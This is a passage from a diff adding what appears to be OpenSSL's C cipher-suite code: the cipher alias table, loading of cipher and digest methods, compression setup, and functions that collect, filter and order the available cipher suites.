+    {0, SSL_TXT_NULL, 0, 0, 0, SSL_eNULL, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_KRB5, 0, SSL_kKRB5, SSL_aKRB5, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_RSA, 0, SSL_kRSA, SSL_aRSA, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_ADH, 0, SSL_kEDH, SSL_aNULL, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_AECDH, 0, SSL_kEECDH, SSL_aNULL, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_PSK, 0, SSL_kPSK, SSL_aPSK, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_SRP, 0, SSL_kSRP, 0, 0, 0, 0, 0, 0, 0, 0},
+
+    /* symmetric encryption aliases */
+    {0, SSL_TXT_DES, 0, 0, 0, SSL_DES, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_3DES, 0, 0, 0, SSL_3DES, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_RC4, 0, 0, 0, SSL_RC4, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_RC2, 0, 0, 0, SSL_RC2, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_IDEA, 0, 0, 0, SSL_IDEA, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_SEED, 0, 0, 0, SSL_SEED, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_eNULL, 0, 0, 0, SSL_eNULL, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_AES128, 0, 0, 0, SSL_AES128 | SSL_AES128GCM, 0, 0, 0, 0, 0,
+     0},
+    {0, SSL_TXT_AES256, 0, 0, 0, SSL_AES256 | SSL_AES256GCM, 0, 0, 0, 0, 0,
+     0},
+    {0, SSL_TXT_AES, 0, 0, 0, SSL_AES, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_AES_GCM, 0, 0, 0, SSL_AES128GCM | SSL_AES256GCM, 0, 0, 0, 0,
+     0, 0},
+    {0, SSL_TXT_CAMELLIA128, 0, 0, 0, SSL_CAMELLIA128, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_CAMELLIA256, 0, 0, 0, SSL_CAMELLIA256, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_CAMELLIA, 0, 0, 0, SSL_CAMELLIA128 | SSL_CAMELLIA256, 0, 0, 0,
+     0, 0, 0},
+
+    /* MAC aliases */
+    {0, SSL_TXT_MD5, 0, 0, 0, 0, SSL_MD5, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_SHA1, 0, 0, 0, 0, SSL_SHA1, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_SHA, 0, 0, 0, 0, SSL_SHA1, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_GOST94, 0, 0, 0, 0, SSL_GOST94, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_GOST89MAC, 0, 0, 0, 0, SSL_GOST89MAC, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_SHA256, 0, 0, 0, 0, SSL_SHA256, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_SHA384, 0, 0, 0, 0, SSL_SHA384, 0, 0, 0, 0, 0},
+
+    /* protocol version aliases */
+    {0, SSL_TXT_SSLV2, 0, 0, 0, 0, 0, SSL_SSLV2, 0, 0, 0, 0},
+    {0, SSL_TXT_SSLV3, 0, 0, 0, 0, 0, SSL_SSLV3, 0, 0, 0, 0},
+    {0, SSL_TXT_TLSV1, 0, 0, 0, 0, 0, SSL_TLSV1, 0, 0, 0, 0},
+    {0, SSL_TXT_TLSV1_2, 0, 0, 0, 0, 0, SSL_TLSV1_2, 0, 0, 0, 0},
+
+    /* export flag */
+    {0, SSL_TXT_EXP, 0, 0, 0, 0, 0, 0, SSL_EXPORT, 0, 0, 0},
+    {0, SSL_TXT_EXPORT, 0, 0, 0, 0, 0, 0, SSL_EXPORT, 0, 0, 0},
+
+    /* strength classes */
+    {0, SSL_TXT_EXP40, 0, 0, 0, 0, 0, 0, SSL_EXP40, 0, 0, 0},
+    {0, SSL_TXT_EXP56, 0, 0, 0, 0, 0, 0, SSL_EXP56, 0, 0, 0},
+    {0, SSL_TXT_LOW, 0, 0, 0, 0, 0, 0, SSL_LOW, 0, 0, 0},
+    {0, SSL_TXT_MEDIUM, 0, 0, 0, 0, 0, 0, SSL_MEDIUM, 0, 0, 0},
+    {0, SSL_TXT_HIGH, 0, 0, 0, 0, 0, 0, SSL_HIGH, 0, 0, 0},
+    /* FIPS 140-2 approved ciphersuite */
+    {0, SSL_TXT_FIPS, 0, 0, 0, ~SSL_eNULL, 0, 0, SSL_FIPS, 0, 0, 0},
+    /* "DHE-" aliases to "EDH-" labels (for forward compatibility) */
+    {0, SSL3_TXT_DHE_DSS_DES_40_CBC_SHA, 0,
+     SSL_kDHE, SSL_aDSS, SSL_DES, SSL_SHA1, SSL_SSLV3, SSL_EXPORT | SSL_EXP40,
+     0, 0, 0,},
+    {0, SSL3_TXT_DHE_DSS_DES_64_CBC_SHA, 0,
+     SSL_kDHE, SSL_aDSS, SSL_DES, SSL_SHA1, SSL_SSLV3, SSL_NOT_EXP | SSL_LOW,
+     0, 0, 0,},
+    {0, SSL3_TXT_DHE_DSS_DES_192_CBC3_SHA, 0,
+     SSL_kDHE, SSL_aDSS, SSL_3DES, SSL_SHA1, SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS, 0, 0, 0,},
+    {0, SSL3_TXT_DHE_RSA_DES_40_CBC_SHA, 0,
+     SSL_kDHE, SSL_aRSA, SSL_DES, SSL_SHA1, SSL_SSLV3, SSL_EXPORT | SSL_EXP40,
+     0, 0, 0,},
+    {0, SSL3_TXT_DHE_RSA_DES_64_CBC_SHA, 0,
+     SSL_kDHE, SSL_aRSA, SSL_DES, SSL_SHA1, SSL_SSLV3, SSL_NOT_EXP | SSL_LOW,
+     0, 0, 0,},
+    {0, SSL3_TXT_DHE_RSA_DES_192_CBC3_SHA, 0,
+     SSL_kDHE, SSL_aRSA, SSL_3DES, SSL_SHA1, SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS, 0, 0, 0,},
+};
+
+/*
+ * Search for public key algorithm with given name and return its pkey_id if
+ * it is available. Otherwise return 0
+ */
+#ifdef OPENSSL_NO_ENGINE
+
+static int get_optional_pkey_id(const char *pkey_name)
+{
+    const EVP_PKEY_ASN1_METHOD *ameth;
+    int pkey_id = 0;
+    ameth = EVP_PKEY_asn1_find_str(NULL, pkey_name, -1);
+    if (ameth) {
+        EVP_PKEY_asn1_get0_info(&pkey_id, NULL, NULL, NULL, NULL, ameth);
+    }
+    return pkey_id;
+}
+
+#else
+
+static int get_optional_pkey_id(const char *pkey_name)
+{
+    const EVP_PKEY_ASN1_METHOD *ameth;
+    ENGINE *tmpeng = NULL;
+    int pkey_id = 0;
+    ameth = EVP_PKEY_asn1_find_str(&tmpeng, pkey_name, -1);
+    if (ameth) {
+        EVP_PKEY_asn1_get0_info(&pkey_id, NULL, NULL, NULL, NULL, ameth);
+    }
+    if (tmpeng)
+        ENGINE_finish(tmpeng);
+    return pkey_id;
+}
+
+#endif
+
+void ssl_load_ciphers(void)
+{
+    ssl_cipher_methods[SSL_ENC_DES_IDX] = EVP_get_cipherbyname(SN_des_cbc);
+    ssl_cipher_methods[SSL_ENC_3DES_IDX] =
+        EVP_get_cipherbyname(SN_des_ede3_cbc);
+    ssl_cipher_methods[SSL_ENC_RC4_IDX] = EVP_get_cipherbyname(SN_rc4);
+    ssl_cipher_methods[SSL_ENC_RC2_IDX] = EVP_get_cipherbyname(SN_rc2_cbc);
+#ifndef OPENSSL_NO_IDEA
+    ssl_cipher_methods[SSL_ENC_IDEA_IDX] = EVP_get_cipherbyname(SN_idea_cbc);
+#else
+    ssl_cipher_methods[SSL_ENC_IDEA_IDX] = NULL;
+#endif
+    ssl_cipher_methods[SSL_ENC_AES128_IDX] =
+        EVP_get_cipherbyname(SN_aes_128_cbc);
+    ssl_cipher_methods[SSL_ENC_AES256_IDX] =
+        EVP_get_cipherbyname(SN_aes_256_cbc);
+    ssl_cipher_methods[SSL_ENC_CAMELLIA128_IDX] =
+        EVP_get_cipherbyname(SN_camellia_128_cbc);
+    ssl_cipher_methods[SSL_ENC_CAMELLIA256_IDX] =
+        EVP_get_cipherbyname(SN_camellia_256_cbc);
+    ssl_cipher_methods[SSL_ENC_GOST89_IDX] =
+        EVP_get_cipherbyname(SN_gost89_cnt);
+    ssl_cipher_methods[SSL_ENC_SEED_IDX] = EVP_get_cipherbyname(SN_seed_cbc);
+
+    ssl_cipher_methods[SSL_ENC_AES128GCM_IDX] =
+        EVP_get_cipherbyname(SN_aes_128_gcm);
+    ssl_cipher_methods[SSL_ENC_AES256GCM_IDX] =
+        EVP_get_cipherbyname(SN_aes_256_gcm);
+
+    ssl_digest_methods[SSL_MD_MD5_IDX] = EVP_get_digestbyname(SN_md5);
+    ssl_mac_secret_size[SSL_MD_MD5_IDX] =
+        EVP_MD_size(ssl_digest_methods[SSL_MD_MD5_IDX]);
+    OPENSSL_assert(ssl_mac_secret_size[SSL_MD_MD5_IDX] >= 0);
+    ssl_digest_methods[SSL_MD_SHA1_IDX] = EVP_get_digestbyname(SN_sha1);
+    ssl_mac_secret_size[SSL_MD_SHA1_IDX] =
+        EVP_MD_size(ssl_digest_methods[SSL_MD_SHA1_IDX]);
+    OPENSSL_assert(ssl_mac_secret_size[SSL_MD_SHA1_IDX] >= 0);
+    ssl_digest_methods[SSL_MD_GOST94_IDX] =
+        EVP_get_digestbyname(SN_id_GostR3411_94);
+    if (ssl_digest_methods[SSL_MD_GOST94_IDX]) {
+        ssl_mac_secret_size[SSL_MD_GOST94_IDX] =
+            EVP_MD_size(ssl_digest_methods[SSL_MD_GOST94_IDX]);
+        OPENSSL_assert(ssl_mac_secret_size[SSL_MD_GOST94_IDX] >= 0);
+    }
+    ssl_digest_methods[SSL_MD_GOST89MAC_IDX] =
+        EVP_get_digestbyname(SN_id_Gost28147_89_MAC);
+    ssl_mac_pkey_id[SSL_MD_GOST89MAC_IDX] = get_optional_pkey_id("gost-mac");
+    if (ssl_mac_pkey_id[SSL_MD_GOST89MAC_IDX]) {
+        ssl_mac_secret_size[SSL_MD_GOST89MAC_IDX] = 32;
+    }
+
+    ssl_digest_methods[SSL_MD_SHA256_IDX] = EVP_get_digestbyname(SN_sha256);
+    ssl_mac_secret_size[SSL_MD_SHA256_IDX] =
+        EVP_MD_size(ssl_digest_methods[SSL_MD_SHA256_IDX]);
+    ssl_digest_methods[SSL_MD_SHA384_IDX] = EVP_get_digestbyname(SN_sha384);
+    ssl_mac_secret_size[SSL_MD_SHA384_IDX] =
+        EVP_MD_size(ssl_digest_methods[SSL_MD_SHA384_IDX]);
+}
+
+#ifndef OPENSSL_NO_COMP
+
+static int sk_comp_cmp(const SSL_COMP *const *a, const SSL_COMP *const *b)
+{
+    return ((*a)->id - (*b)->id);
+}
+
+static void load_builtin_compressions(void)
+{
+    int got_write_lock = 0;
+
+    CRYPTO_r_lock(CRYPTO_LOCK_SSL);
+    if (ssl_comp_methods == NULL) {
+        CRYPTO_r_unlock(CRYPTO_LOCK_SSL);
+        CRYPTO_w_lock(CRYPTO_LOCK_SSL);
+        got_write_lock = 1;
+
+        if (ssl_comp_methods == NULL) {
+            SSL_COMP *comp = NULL;
+
+            MemCheck_off();
+            ssl_comp_methods = sk_SSL_COMP_new(sk_comp_cmp);
+            if (ssl_comp_methods != NULL) {
+                comp = (SSL_COMP *)OPENSSL_malloc(sizeof(SSL_COMP));
+                if (comp != NULL) {
+                    comp->method = COMP_zlib();
+                    if (comp->method && comp->method->type == NID_undef)
+                        OPENSSL_free(comp);
+                    else {
+                        comp->id = SSL_COMP_ZLIB_IDX;
+                        comp->name = comp->method->name;
+                        sk_SSL_COMP_push(ssl_comp_methods, comp);
+                    }
+                }
+                sk_SSL_COMP_sort(ssl_comp_methods);
+            }
+            MemCheck_on();
+        }
+    }
+
+    if (got_write_lock)
+        CRYPTO_w_unlock(CRYPTO_LOCK_SSL);
+    else
+        CRYPTO_r_unlock(CRYPTO_LOCK_SSL);
+}
+#endif
+
+int ssl_cipher_get_evp(const SSL_SESSION *s, const EVP_CIPHER **enc,
+                       const EVP_MD **md, int *mac_pkey_type,
+                       int *mac_secret_size, SSL_COMP **comp)
+{
+    int i;
+    const SSL_CIPHER *c;
+
+    c = s->cipher;
+    if (c == NULL)
+        return (0);
+    if (comp != NULL) {
+        SSL_COMP ctmp;
+#ifndef OPENSSL_NO_COMP
+        load_builtin_compressions();
+#endif
+
+        *comp = NULL;
+        ctmp.id = s->compress_meth;
+        if (ssl_comp_methods != NULL) {
+            i = sk_SSL_COMP_find(ssl_comp_methods, &ctmp);
+            if (i >= 0)
+                *comp = sk_SSL_COMP_value(ssl_comp_methods, i);
+            else
+                *comp = NULL;
+        }
+    }
+
+    if ((enc == NULL) || (md == NULL))
+        return (0);
+
+    switch (c->algorithm_enc) {
+    case SSL_DES:
+        i = SSL_ENC_DES_IDX;
+        break;
+    case SSL_3DES:
+        i = SSL_ENC_3DES_IDX;
+        break;
+    case SSL_RC4:
+        i = SSL_ENC_RC4_IDX;
+        break;
+    case SSL_RC2:
+        i = SSL_ENC_RC2_IDX;
+        break;
+    case SSL_IDEA:
+        i = SSL_ENC_IDEA_IDX;
+        break;
+    case SSL_eNULL:
+        i = SSL_ENC_NULL_IDX;
+        break;
+    case SSL_AES128:
+        i = SSL_ENC_AES128_IDX;
+        break;
+    case SSL_AES256:
+        i = SSL_ENC_AES256_IDX;
+        break;
+    case SSL_CAMELLIA128:
+        i = SSL_ENC_CAMELLIA128_IDX;
+        break;
+    case SSL_CAMELLIA256:
+        i = SSL_ENC_CAMELLIA256_IDX;
+        break;
+    case SSL_eGOST2814789CNT:
+        i = SSL_ENC_GOST89_IDX;
+        break;
+    case SSL_SEED:
+        i = SSL_ENC_SEED_IDX;
+        break;
+    case SSL_AES128GCM:
+        i = SSL_ENC_AES128GCM_IDX;
+        break;
+    case SSL_AES256GCM:
+        i = SSL_ENC_AES256GCM_IDX;
+        break;
+    default:
+        i = -1;
+        break;
+    }
+
+    if ((i < 0) || (i >= SSL_ENC_NUM_IDX))
+        *enc = NULL;
+    else {
+        if (i == SSL_ENC_NULL_IDX)
+            *enc = EVP_enc_null();
+        else
+            *enc = ssl_cipher_methods[i];
+    }
+
+    switch (c->algorithm_mac) {
+    case SSL_MD5:
+        i = SSL_MD_MD5_IDX;
+        break;
+    case SSL_SHA1:
+        i = SSL_MD_SHA1_IDX;
+        break;
+    case SSL_SHA256:
+        i = SSL_MD_SHA256_IDX;
+        break;
+    case SSL_SHA384:
+        i = SSL_MD_SHA384_IDX;
+        break;
+    case SSL_GOST94:
+        i = SSL_MD_GOST94_IDX;
+        break;
+    case SSL_GOST89MAC:
+        i = SSL_MD_GOST89MAC_IDX;
+        break;
+    default:
+        i = -1;
+        break;
+    }
+    if ((i < 0) || (i >= SSL_MD_NUM_IDX)) {
+        *md = NULL;
+        if (mac_pkey_type != NULL)
+            *mac_pkey_type = NID_undef;
+        if (mac_secret_size != NULL)
+            *mac_secret_size = 0;
+        if (c->algorithm_mac == SSL_AEAD)
+            mac_pkey_type = NULL;
+    } else {
+        *md = ssl_digest_methods[i];
+        if (mac_pkey_type != NULL)
+            *mac_pkey_type = ssl_mac_pkey_id[i];
+        if (mac_secret_size != NULL)
+            *mac_secret_size = ssl_mac_secret_size[i];
+    }
+
+    if ((*enc != NULL) &&
+        (*md != NULL || (EVP_CIPHER_flags(*enc) & EVP_CIPH_FLAG_AEAD_CIPHER))
+        && (!mac_pkey_type || *mac_pkey_type != NID_undef)) {
+        const EVP_CIPHER *evp;
+
+        if (s->ssl_version >> 8 != TLS1_VERSION_MAJOR ||
+            s->ssl_version < TLS1_VERSION)
+            return 1;
+
+#ifdef OPENSSL_FIPS
+        if (FIPS_mode())
+            return 1;
+#endif
+
+        if (c->algorithm_enc == SSL_RC4 &&
+            c->algorithm_mac == SSL_MD5 &&
+            (evp = EVP_get_cipherbyname("RC4-HMAC-MD5")))
+            *enc = evp, *md = NULL;
+        else if (c->algorithm_enc == SSL_AES128 &&
+                 c->algorithm_mac == SSL_SHA1 &&
+                 (evp = EVP_get_cipherbyname("AES-128-CBC-HMAC-SHA1")))
+            *enc = evp, *md = NULL;
+        else if (c->algorithm_enc == SSL_AES256 &&
+                 c->algorithm_mac == SSL_SHA1 &&
+                 (evp = EVP_get_cipherbyname("AES-256-CBC-HMAC-SHA1")))
+            *enc = evp, *md = NULL;
+        else if (c->algorithm_enc == SSL_AES128 &&
+                 c->algorithm_mac == SSL_SHA256 &&
+                 (evp = EVP_get_cipherbyname("AES-128-CBC-HMAC-SHA256")))
+            *enc = evp, *md = NULL;
+        else if (c->algorithm_enc == SSL_AES256 &&
+                 c->algorithm_mac == SSL_SHA256 &&
+                 (evp = EVP_get_cipherbyname("AES-256-CBC-HMAC-SHA256")))
+            *enc = evp, *md = NULL;
+        return (1);
+    } else
+        return (0);
+}
+
+int ssl_get_handshake_digest(int idx, long *mask, const EVP_MD **md)
+{
+    if (idx < 0 || idx >= SSL_MD_NUM_IDX) {
+        return 0;
+    }
+    *mask = ssl_handshake_digest_flag[idx];
+    if (*mask)
+        *md = ssl_digest_methods[idx];
+    else
+        *md = NULL;
+    return 1;
+}
+
+#define ITEM_SEP(a) \
+        (((a) == ':') || ((a) == ' ') || ((a) == ';') || ((a) == ','))
+
+static void ll_append_tail(CIPHER_ORDER **head, CIPHER_ORDER *curr,
+                           CIPHER_ORDER **tail)
+{
+    if (curr == *tail)
+        return;
+    if (curr == *head)
+        *head = curr->next;
+    if (curr->prev != NULL)
+        curr->prev->next = curr->next;
+    if (curr->next != NULL)
+        curr->next->prev = curr->prev;
+    (*tail)->next = curr;
+    curr->prev = *tail;
+    curr->next = NULL;
+    *tail = curr;
+}
+
+static void ll_append_head(CIPHER_ORDER **head, CIPHER_ORDER *curr,
+                           CIPHER_ORDER **tail)
+{
+    if (curr == *head)
+        return;
+    if (curr == *tail)
+        *tail = curr->prev;
+    if (curr->next != NULL)
+        curr->next->prev = curr->prev;
+    if (curr->prev != NULL)
+        curr->prev->next = curr->next;
+    (*head)->prev = curr;
+    curr->next = *head;
+    curr->prev = NULL;
+    *head = curr;
+}
+
+static void ssl_cipher_get_disabled(unsigned long *mkey, unsigned long *auth,
+                                    unsigned long *enc, unsigned long *mac,
+                                    unsigned long *ssl)
+{
+    *mkey = 0;
+    *auth = 0;
+    *enc = 0;
+    *mac = 0;
+    *ssl = 0;
+
+#ifdef OPENSSL_NO_RSA
+    *mkey |= SSL_kRSA;
+    *auth |= SSL_aRSA;
+#endif
+#ifdef OPENSSL_NO_DSA
+    *auth |= SSL_aDSS;
+#endif
+#ifdef OPENSSL_NO_DH
+    *mkey |= SSL_kDHr | SSL_kDHd | SSL_kEDH;
+    *auth |= SSL_aDH;
+#endif
+#ifdef OPENSSL_NO_KRB5
+    *mkey |= SSL_kKRB5;
+    *auth |= SSL_aKRB5;
+#endif
+#ifdef OPENSSL_NO_ECDSA
+    *auth |= SSL_aECDSA;
+#endif
+#ifdef OPENSSL_NO_ECDH
+    *mkey |= SSL_kECDHe | SSL_kECDHr;
+    *auth |= SSL_aECDH;
+#endif
+#ifdef OPENSSL_NO_PSK
+    *mkey |= SSL_kPSK;
+    *auth |= SSL_aPSK;
+#endif
+#ifdef OPENSSL_NO_SRP
+    *mkey |= SSL_kSRP;
+#endif
+    /*
+     * Check for presence of GOST 34.10 algorithms, and if they do not
+     * present, disable appropriate auth and key exchange
+     */
+    if (!get_optional_pkey_id("gost94")) {
+        *auth |= SSL_aGOST94;
+    }
+    if (!get_optional_pkey_id("gost2001")) {
+        *auth |= SSL_aGOST01;
+    }
+    /*
+     * Disable GOST key exchange if no GOST signature algs are available *
+     */
+    if ((*auth & (SSL_aGOST94 | SSL_aGOST01)) == (SSL_aGOST94 | SSL_aGOST01)) {
+        *mkey |= SSL_kGOST;
+    }
+#ifdef SSL_FORBID_ENULL
+    *enc |= SSL_eNULL;
+#endif
+
+    *enc |= (ssl_cipher_methods[SSL_ENC_DES_IDX] == NULL) ? SSL_DES : 0;
+    *enc |= (ssl_cipher_methods[SSL_ENC_3DES_IDX] == NULL) ? SSL_3DES : 0;
+    *enc |= (ssl_cipher_methods[SSL_ENC_RC4_IDX] == NULL) ? SSL_RC4 : 0;
+    *enc |= (ssl_cipher_methods[SSL_ENC_RC2_IDX] == NULL) ? SSL_RC2 : 0;
+    *enc |= (ssl_cipher_methods[SSL_ENC_IDEA_IDX] == NULL) ? SSL_IDEA : 0;
+    *enc |= (ssl_cipher_methods[SSL_ENC_AES128_IDX] == NULL) ? SSL_AES128 : 0;
+    *enc |= (ssl_cipher_methods[SSL_ENC_AES256_IDX] == NULL) ? SSL_AES256 : 0;
+    *enc |=
+        (ssl_cipher_methods[SSL_ENC_AES128GCM_IDX] ==
+         NULL) ? SSL_AES128GCM : 0;
+    *enc |=
+        (ssl_cipher_methods[SSL_ENC_AES256GCM_IDX] ==
+         NULL) ? SSL_AES256GCM : 0;
+    *enc |=
+        (ssl_cipher_methods[SSL_ENC_CAMELLIA128_IDX] ==
+         NULL) ? SSL_CAMELLIA128 : 0;
+    *enc |=
+        (ssl_cipher_methods[SSL_ENC_CAMELLIA256_IDX] ==
+         NULL) ? SSL_CAMELLIA256 : 0;
+    *enc |=
+        (ssl_cipher_methods[SSL_ENC_GOST89_IDX] ==
+         NULL) ? SSL_eGOST2814789CNT : 0;
+    *enc |= (ssl_cipher_methods[SSL_ENC_SEED_IDX] == NULL) ? SSL_SEED : 0;
+
+    *mac |= (ssl_digest_methods[SSL_MD_MD5_IDX] == NULL) ? SSL_MD5 : 0;
+    *mac |= (ssl_digest_methods[SSL_MD_SHA1_IDX] == NULL) ? SSL_SHA1 : 0;
+    *mac |= (ssl_digest_methods[SSL_MD_SHA256_IDX] == NULL) ? SSL_SHA256 : 0;
+    *mac |= (ssl_digest_methods[SSL_MD_SHA384_IDX] == NULL) ? SSL_SHA384 : 0;
+    *mac |= (ssl_digest_methods[SSL_MD_GOST94_IDX] == NULL) ? SSL_GOST94 : 0;
+    *mac |= (ssl_digest_methods[SSL_MD_GOST89MAC_IDX] == NULL
+             || ssl_mac_pkey_id[SSL_MD_GOST89MAC_IDX] ==
+             NID_undef) ? SSL_GOST89MAC : 0;
+
+}
+
+static void ssl_cipher_collect_ciphers(const SSL_METHOD *ssl_method,
+                                       int num_of_ciphers,
+                                       unsigned long disabled_mkey,
+                                       unsigned long disabled_auth,
+                                       unsigned long disabled_enc,
+                                       unsigned long disabled_mac,
+                                       unsigned long disabled_ssl,
+                                       CIPHER_ORDER *co_list,
+                                       CIPHER_ORDER **head_p,
+                                       CIPHER_ORDER **tail_p)
+{
+    int i, co_list_num;
+    const SSL_CIPHER *c;
+
+    /*
+     * We have num_of_ciphers descriptions compiled in, depending on the
+     * method selected (SSLv2 and/or SSLv3, TLSv1 etc).
+     * These will later be sorted in a linked list with at most num
+     * entries.
+     */
+
+    /* Get the initial list of ciphers */
+    co_list_num = 0;            /* actual count of ciphers */
+    for (i = 0; i < num_of_ciphers; i++) {
+        c = ssl_method->get_cipher(i);
+        /* drop those that use any of that is not available */
+        if ((c != NULL) && c->valid &&
+#ifdef OPENSSL_FIPS
+            (!FIPS_mode() || (c->algo_strength & SSL_FIPS)) &&
+#endif
+            !(c->algorithm_mkey & disabled_mkey) &&
+            !(c->algorithm_auth & disabled_auth) &&
+            !(c->algorithm_enc & disabled_enc) &&
+            !(c->algorithm_mac & disabled_mac) &&
+            !(c->algorithm_ssl & disabled_ssl)) {
+            co_list[co_list_num].cipher = c;
+            co_list[co_list_num].next = NULL;
+            co_list[co_list_num].prev = NULL;
+            co_list[co_list_num].active = 0;
+            co_list_num++;
+#ifdef KSSL_DEBUG
+            fprintf(stderr, "\t%d: %s %lx %lx %lx\n", i, c->name, c->id,
+                    c->algorithm_mkey, c->algorithm_auth);
+#endif                          /* KSSL_DEBUG */
+            /*
+             * if (!sk_push(ca_list,(char *)c)) goto err;
+             */
+        }
+    }
+
+    /*
+     * Prepare linked list from list entries
+     */
+    if (co_list_num > 0) {
+        co_list[0].prev = NULL;
+
+        if (co_list_num > 1) {
+            co_list[0].next = &co_list[1];
+
+            for (i = 1; i < co_list_num - 1; i++) {
+                co_list[i].prev = &co_list[i - 1];
+                co_list[i].next = &co_list[i + 1];
+            }
+
+            co_list[co_list_num - 1].prev = &co_list[co_list_num - 2];
+        }
+
+        co_list[co_list_num - 1].next = NULL;
+
+        *head_p = &co_list[0];
+        *tail_p = &co_list[co_list_num - 1];
+    }
+}
+
+static void ssl_cipher_collect_aliases(const SSL_CIPHER **ca_list,
+                                       int num_of_group_aliases,
+                                       unsigned long disabled_mkey,
+                                       unsigned long disabled_auth,
+                                       unsigned long disabled_enc,
+                                       unsigned long disabled_mac,
+                                       unsigned long disabled_ssl,
+                                       CIPHER_ORDER *head)
+{
+    CIPHER_ORDER *ciph_curr;
+    const SSL_CIPHER **ca_curr;
+    int i;
+    unsigned long mask_mkey = ~disabled_mkey;
+    unsigned long mask_auth = ~disabled_auth;
+    unsigned long mask_enc = ~disabled_enc;
+    unsigned long mask_mac = ~disabled_mac;
+    unsigned long mask_ssl = ~disabled_ssl;
+
+    /*
+     * First, add the real ciphers as already collected
+     */
+    ciph_curr = head;
+    ca_curr = ca_list;
+    while (ciph_curr != NULL) {
+        *ca_curr = ciph_curr->cipher;
+        ca_curr++;
+        ciph_curr = ciph_curr->next;
+    }
+
+    /*
+     * Now we add the available ones from the cipher_aliases[] table.
+     * They represent either one or more algorithms, some of which
+     * in any affected category must be supported (set in enabled_mask),
+     * or represent a cipher strength value (will be added in any case because algorithms=0).
+     */
+    for (i = 0; i < num_of_group_aliases; i++) {
+        unsigned long algorithm_mkey = cipher_aliases[i].algorithm_mkey;
+        unsigned long algorithm_auth = cipher_aliases[i].algorithm_auth;
+        unsigned long algorithm_enc = cipher_aliases[i].algorithm_enc;
+        unsigned long algorithm_mac = cipher_aliases[i].algorithm_mac;
+        unsigned long algorithm_ssl = cipher_aliases[i].algorithm_ssl;
+
+        if (algorithm_mkey)
+            if ((algorithm_mkey & mask_mkey) == 0)
+                continue;
+
+        if (algorithm_auth)
+            if ((algorithm_auth & mask_auth) == 0)
+                continue;
+
+        if (algorithm_enc)
+            if ((algorithm_enc & mask_enc) == 0)
+                continue;
+
+        if (algorithm_mac)
+            if ((algorithm_mac & mask_mac) == 0)
+                continue;
+
+        if (algorithm_ssl)
+            if ((algorithm_ssl & mask_ssl) == 0)
+                continue;
+
+        *ca_curr = (SSL_CIPHER *)(cipher_aliases + i);
+        ca_curr++;
+    }
+
+    *ca_curr = NULL;            /* end of list */
+}
+
+static void ssl_cipher_apply_rule(unsigned long cipher_id,
+                                  unsigned long alg_mkey,
+                                  unsigned long alg_auth,
+                                  unsigned long alg_enc,
+                                  unsigned long alg_mac,
+                                  unsigned long alg_ssl,
+                                  unsigned long algo_strength, int rule,
+                                  int strength_bits, CIPHER_ORDER **head_p,
+                                  CIPHER_ORDER **tail_p)
+{
+    CIPHER_ORDER *head, *tail, *curr, *next, *last;
+    const SSL_CIPHER *cp;
+    int reverse = 0;
+
+#ifdef CIPHER_DEBUG
+    fprintf(stderr,
+            "Applying rule %d with %08lx/%08lx/%08lx/%08lx/%08lx %08lx (%d)\n",
+            rule, alg_mkey, alg_auth, alg_enc, alg_mac, alg_ssl,
+            algo_strength, strength_bits);
+#endif
+
+    if (rule == CIPHER_DEL)
+        reverse = 1;            /* needed to maintain sorting between
+                                 * currently deleted ciphers */
+
+    head = *head_p;
+    tail = *tail_p;
+
+    if (reverse) {
+        next = tail;
+        last = head;
+    } else {
+        next = head;
+        last = tail;
+    }
+
+    curr = NULL;
+    for (;;) {
+        if (curr == last)
+            break;
+
+        curr = next;
+
+        if (curr == NULL)
+            break;
+
+        next = reverse ? curr->prev : curr->next;
+
+        cp = curr->cipher;
+
+        /*
+         * Selection criteria is either the value of strength_bits
+         * or the algorithms used.
+         */
+        if (strength_bits >= 0) {
+            if (strength_bits != cp->strength_bits)
+                continue;
+        } else {
+#ifdef CIPHER_DEBUG
+            fprintf(stderr,
+                    "\nName: %s:\nAlgo = %08lx/%08lx/%08lx/%08lx/%08lx Algo_strength = %08lx\n",
+                    cp->name, cp->algorithm_mkey, cp->algorithm_auth,
+                    cp->algorithm_enc, cp->algorithm_mac, cp->algorithm_ssl,
+                    cp->algo_strength);
+#endif
+#ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+            if (cipher_id && cipher_id != cp->id)
+                continue;
+#endif
+            if (alg_mkey && !(alg_mkey & cp->algorithm_mkey))
+                continue;
+            if (alg_auth && !(alg_auth & cp->algorithm_auth))
+                continue;
+            if (alg_enc && !(alg_enc & cp->algorithm_enc))
+                continue;
+            if (alg_mac && !(alg_mac & cp->algorithm_mac))
+                continue;
+            if (alg_ssl && !(alg_ssl & cp->algorithm_ssl))
+                continue;
+            if ((algo_strength & SSL_EXP_MASK)
+                && !(algo_strength & SSL_EXP_MASK & cp->algo_strength))
+                continue;
+            if ((algo_strength & SSL_STRONG_MASK)
+                && !(algo_strength & SSL_STRONG_MASK & cp->algo_strength))
+                continue;
+        }
+
+#ifdef CIPHER_DEBUG
+        fprintf(stderr, "Action = %d\n", rule);
+#endif
+
+        /* add the cipher if it has not been added yet. */
+        if (rule == CIPHER_ADD) {
+            /* reverse == 0 */
+            if (!curr->active) {
